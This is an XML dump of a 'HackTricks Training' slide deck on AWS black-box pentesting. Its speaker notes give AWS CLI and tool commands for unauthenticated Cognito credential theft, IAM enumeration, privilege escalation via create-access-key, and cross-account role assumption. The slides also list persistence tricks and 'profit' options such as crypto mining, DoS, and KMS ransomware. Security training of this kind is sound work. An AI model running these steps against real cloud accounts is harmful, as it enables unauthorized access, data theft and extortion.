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fntdata" ContentType="application/x-fontdata"/>
  <Default Extension="png" ContentType="image/png"/>
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationship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embedTrueTypeFonts="1" saveSubsetFonts="1" autoCompressPictures="0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5143500"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Medium"/>
      <p:regular r:id="rId17"/>
      <p:bold r:id="rId18"/>
      <p:italic r:id="rId19"/>
      <p:boldItalic r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono SemiBold"/>
      <p:regular r:id="rId21"/>
      <p:bold r:id="rId22"/>
      <p:italic r:id="rId23"/>
      <p:boldItalic r:id="rId24"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Raleway ExtraBold"/>
      <p:bold r:id="rId25"/>
      <p:boldItalic r:id="rId26"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono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font" Target="/ppt/fonts/RobotoMonoMedium-boldItalic.fntdata" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoSemiBold-bold.fntdata" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoSemiBold-regular.fntdata" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoSemiBold-boldItalic.fntdata" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoSemiBold-italic.fntdata" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="/ppt/theme/theme1.xml" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="/ppt/viewProps.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="/ppt/presProps.xml" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="/ppt/slideMasters/slideMaster1.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide4.xml" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RalewayExtraBold-boldItalic.fntdata" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RalewayExtraBold-bold.fntdata" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMono-bold.fntdata" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMono-regular.fntdata" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="/ppt/notesMasters/notesMaster1.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide1.xml" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMono-italic.fntdata" Id="rId29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font" Target="/ppt/fonts/RobotoMono-boldItalic.fntdata" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide6.xml" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide5.xml" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide8.xml" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide7.xml" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide10.xml" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide9.xml" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoMedium-regular.fntdata" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="/ppt/slides/slide11.xml" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoMedium-italic.fntdata" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="/ppt/fonts/RobotoMonoMedium-bold.fntdata" Id="rId1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/ppt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10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2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3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4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Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/cognito/code/?region=us-east-1&amp;pool=us-east-1:cbdeb835-a72e-49cf-b7fd-ad033e8e8ed3" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-east-1.console.aws.amazon.com/iamv2/home#/roles/details/Cognito_UantuAccessUnauth_Role?section=permissions" TargetMode="External" Id="rId3" /></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide5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6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7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8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_rels/notesSlide9.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="/ppt/notesMasters/notesMaster1.xml" Id="rId1" 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57b1d3af8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257b1d3af8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7b97e47be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07b97e47be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https://github.com/hotnops/AWSRoleJuggler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find_circular_trust.py #Nothing found because code isn’t correct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aws_role_juggler.py -r 'arn:aws:iam::947247140022:role/Circle1' 'arn:aws:iam::947247140022:role/Circle2'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#Code modified to only sleep 10s (and not 15min)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07b97e47be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07b97e47be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07b97e47b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07b97e47b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07b97e47be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207b97e47b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https://github.com/search?q=%2Fus-east-1%3A%5B0-9a-fA-F%5D%7B8%7D-%5B0-9a-fA-F%5D%7B4%7D-%5B0-9a-fA-F%5D%7B4%7D-%5B0-9a-fA-F%5D%7B4%7D-%5B0-9a-fA-F%5D%7B12%7D%2F&amp;type=code&amp;ref=advsearch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07b97e47be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07b97e47be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1- Roles &amp; Usernames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Comprobar si existe el role arn:aws:iam::234896977264:role/OrganizationAccountAccessRole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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://us-east-1.console.aws.amazon.com/cognito/code/?region=us-east-1&amp;pool=us-east-1:cbdeb835-a72e-49cf-b7fd-ad033e8e8ed3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(Show allow basic flow)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cognito-identity get-id --identity-pool-id us-east-1:cbdeb835-a72e-49cf-b7fd-ad033e8e8ed3 --no-sign --region us-east-1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cognito-identity get-credentials-for-identity --identity-id &lt;fill&gt; --no-sign --region us-east-1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sts get-caller-identity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iam list-users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cognito-identity get-id --identity-pool-id us-east-1:cbdeb835-a72e-49cf-b7fd-ad033e8e8ed3 --no-sign --region us-east-1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cognito-identity get-open-id-token --identity-id &lt;identity_id&gt; --no-sign --region us-east-1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sts assume-role-with-web-identity --role-arn arn:aws:iam::947247140022:role/Cognito_UantuAccessUnauth_Role --role-session-name sessionname --web-identity-token &lt;token&gt; --no-sign --region us-east-1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iam list-users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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://us-east-1.console.aws.amazon.com/iamv2/home#/roles/details/Cognito_UantuAccessUnauth_Role?section=permissions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07b97e47be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07b97e47be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cd git/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bf-aws-permissions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bash bf-aws-permissions.sh -p "&lt;profile-name&gt;"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cd git/enumerate-iam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enumerate-iam.py --region us-east-1 --access-key ACCESS_KEY --secret-key SECRET_KEY --session-token SESSION_TOKEN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Check all “worked!” (including: ‘iam.list_users() worked!’)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cd git/weirdAAL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#write credentials in .env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weirdAAL.py -m ec2_describe_instances -t ec2test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weirdAAL.py -m iam_list_users -t iamtest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weirdAAL.py -m recon_all -t MyTarget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# CloudSploit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./index.js --console=text --config ./config.js --json /tmp/out-cloudsploit.json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07b97e47be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07b97e47be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iam create-access-key --user-name Admin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07b97e47be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07b97e47be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get-role --role-name Cognito_UantuAccessUnauth_Role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inline policy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list-role-policies --role-name Cognito_UantuAccessUnauth_Role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get-role-policy --role-name Cognito_UantuAccessUnauth_Role --policy-name "oneClick_Cognito_UantuAccessUnauth_Role_1676478809779"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attached policies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list-attached-role-policies --role-name Cognito_UantuAccessUnauth_Role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get-policy --policy-arn arn:aws:iam::947247140022:policy/PrivescPolicy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list-policy-versions --policy-arn arn:aws:iam::947247140022:policy/Prive scPolicy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iam get-policy-version --policy-arn arn:aws:iam::947247140022:policy/PrivescPolicy --version-id v1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org accounts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organizations list-accounts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07b97e47be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07b97e47be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Assume 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myadmin sts assume-role --role-arn arn:aws:iam::234896977264:role/OrganizationAccountAccessRole --role-session-name sessionname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attached policies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aws --profile temp iam list-attached-role-policies --role-name OrganizationAccountAccessRole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7b97e47be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07b97e47be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console access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source venv/bin/activate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cd ../aws_consoler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python3 aws_consoler/cli.py --profile temp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# Get codebuild code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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-codebuild-post-exploitation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Roboto Mono SemiBold"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:latin typeface="Roboto Mono SemiBold"/>
                <a:ea typeface="Roboto Mono SemiBold"/>
                <a:cs typeface="Roboto Mono SemiBold"/>
                <a:sym typeface="Roboto Mono SemiBol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Roboto Mono Medium"/>
              <a:buNone/>
              <a:defRPr sz="3600"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oboto Mono Medium"/>
              <a:buNone/>
              <a:defRPr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■"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seño personalizado 1">
  <p:cSld name="CUSTOM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24" name="Google Shape;24;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539525" y="1654550"/>
            <a:ext cx="801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Lalalalalalalala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image" Target="/ppt/media/image1.png" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image4.png" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="/ppt/slideLayouts/slideLayout1.xml" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="/ppt/slideLayouts/slideLayout2.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="/ppt/slideLayouts/slideLayout3.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="/ppt/slideLayouts/slideLayout4.xml" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="/ppt/theme/theme1.xml" Id="rId7" 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Roboto Mono Medium"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1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Mono"/>
              <a:buChar char="●"/>
              <a:defRPr sz="18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●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○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 Mono"/>
              <a:buChar char="■"/>
              <a:defRPr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4733" y="51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33125" y="4032625"/>
            <a:ext cx="1110876" cy="111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084300"/>
            <a:ext cx="1007524" cy="10075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notesSlide" Target="/ppt/notesSlides/notesSlide1.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image1.png" Id="rId3" /></Relationships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10.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-persistence/aws-secrets-manager-persistence" TargetMode="External" Id="rId3" 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11.xml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2.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/ppt/media/image3.png" Id="rId3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3.xml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4.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum" TargetMode="External" Id="rId6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5.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/Cloudtrail2IAM" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/tfstate2IAM" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/andresriancho/enumerate-iam" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carnal0wnage/weirdAAL" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/turbot/steampipe-mod-aws-perimeter" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/turbot/steampipe-mod-aws-insights" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/aws-Perms2ManagedPolicies" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/aquasecurity/cloudsploit" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BishopFox/cloudfox" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/bf-aws-permissions" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/bf-aws-perms-simulate" TargetMode="External" Id="rId8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6.xml" Id="rId2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7.xml" Id="rId2" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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8.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting#compromising-the-organization" TargetMode="External" Id="rId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notesSlide" Target="/ppt/notesSlides/notesSlide9.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-iam-post-exploitation" TargetMode="External" Id="rId3" /></Relationships>
</file>

<file path=ppt/slides/slide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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3598350" y="12001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3850">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AWS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="3850"/>
              <a:t> Black Box Methodology</a:t>
            </a:r>
            <a:endParaRPr sz="3850"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55150" y="458550"/>
            <a:ext cx="4226401" cy="42264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 txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3598350" y="1912975"/>
            <a:ext cx="5462400" cy="16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780">
              <a:solidFill>
                <a:srgbClr val="72110C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70">
                <a:solidFill>
                  <a:srgbClr val="72110C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HackTricks Training</a:t>
            </a:r>
            <a:endParaRPr sz="2670">
              <a:solidFill>
                <a:srgbClr val="72110C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
        <p:nvSpPr>
          <p:cNvPr id="3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Persistence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99" name="Google Shape;99;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="7275600" cy="27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Secrets Rotation Lambda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500"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500" u="sng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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-persistence/aws-secrets-manager-persistence</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="accent4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Backdoor Role Trust Policies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Role Chain Juggling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100" name="Google Shape;100;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151900" y="4728000"/>
            <a:ext cx="4840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set some persistence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101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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Profit”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="88323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Crypto mining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Dump everything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Kill everything (DoS)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Change KMS keys - Ransomware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Or give yourself access to the clients KMS keys and remove it from him (--bypass-policy-lockout-safety-check)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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1233000" y="4728000"/>
            <a:ext cx="66780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obtained a sensitive token to access Github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108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Cyber Kill Chain</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Google Shape;37;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="3044400" cy="35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1- Enumeration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2- Exploitation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3- Internal Enumeration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4- Post exploitation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5- Persistence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6- Privilege Escalation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"/>
              <a:t>7- Profit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3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="25825" t="19020" r="27270" b="17600"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3636350" y="958700"/>
            <a:ext cx="4109750" cy="3123800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
        <p:nvSpPr>
          <p:cNvPr id="39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Discovery &amp; Enumeration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Google Shape;44;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802350" y="929975"/>
            <a:ext cx="75393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OSINT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Github Leaks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Open Buckets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Spidering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Brute-Force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Open ports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Exploits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Brute-Force credentials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Web</a:t>
            </a:r>
            <a:endParaRPr sz="150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SSRF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Public AMIs, EBS Snapshots, RDS Snapshots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Roles &amp; Usernames enumeration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Cognito Credentials</a:t>
            </a:r>
            <a:endParaRPr sz="150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Federated Identities</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Google Shape;45;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1686425" y="4728000"/>
            <a:ext cx="61647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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es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:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es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 We found some Cognito misconfiguration</a:t>
            </a:r>
            <a:endParaRPr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 xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
        <p:nvSpPr>
          <p:cNvPr id="4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Exploitation</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;51;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787500" y="877500"/>
            <a:ext cx="78807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10000"/>
          </a:bodyPr>
          <a:lstStyle/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OSINT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-2774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78571"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Github Leaks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-27749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>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets</a:t>
            </a:r>
            <a:endParaRPr sz="1100"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Open Buckets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Spidering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Brute-Force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 u="sng">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum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Open ports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Exploits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Brute-Force credentials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Web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/>
              <a:t>SSRF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 u="sng">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf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Public AMIs, EBS Snapshots, RDS Snapshots</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-29083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s" u="sng">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum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Roles &amp; Usernames enumeration (demo)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Cognito Credentials (demo)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-30861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s"/>
              <a:t>Federated Identities (demo)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;52;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2307750" y="4728000"/>
            <a:ext cx="4840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got Cognito credentials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3" name="Google Shape;53;p9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5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Internal Enumeration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;59;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1057525"/>
            <a:ext cx="88323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 sz="1400"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1400"/>
              <a:t>Console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 sz="1400"/>
              <a:t>AWS cli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 sz="1400"/>
              <a:t>Steampipe</a:t>
            </a:r>
            <a:endParaRPr sz="1400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https://github.com/turbot/steampipe-mod-aws-perimeter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https://github.com/turbot/steampipe-mod-aws-insights</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4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</a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent4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CloudSploit</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="accent4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●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Cloudfox</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill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 sz="1400"/>
              <a:t>Prowler doesn’t work without access to generate a credential report</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/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 sz="1400"/>
              <a:t>Current privileges BF:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/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https://github.com/carlospolop/bf-aws-permissions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https://github.com/carlospolop/bf-aws-perms-simulate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https://github.com/carlospolop/aws-Perms2ManagedPolicies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https://github.com/carlospolop/tfstate2IAM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https://github.com/carlospolop/Cloudtrail2IAM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https://github.com/carnal0wnage/weirdAAL</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="91440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○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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https://github.com/andresriancho/enumerate-iam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60" name="Google Shape;60;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151900" y="4728000"/>
            <a:ext cx="4840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found interesting privileges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1" name="Google Shape;61;p10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62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IAM Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Google Shape;67;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="7813800" cy="19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HackTricks has hundreds of documented permissions that can be used to escalate privileges:</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-3238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s" sz="1500"/>
              <a:t>https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-privilege-escalation</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-32385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iam:CreateAccessKey (demo)</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="45720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t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151900" y="4727875"/>
            <a:ext cx="4840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escalated to Administrator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9" name="Google Shape;69;p11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70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Internal Enumeration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="7381500" cy="17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IAM recon (demo)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Org recon (demo)</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
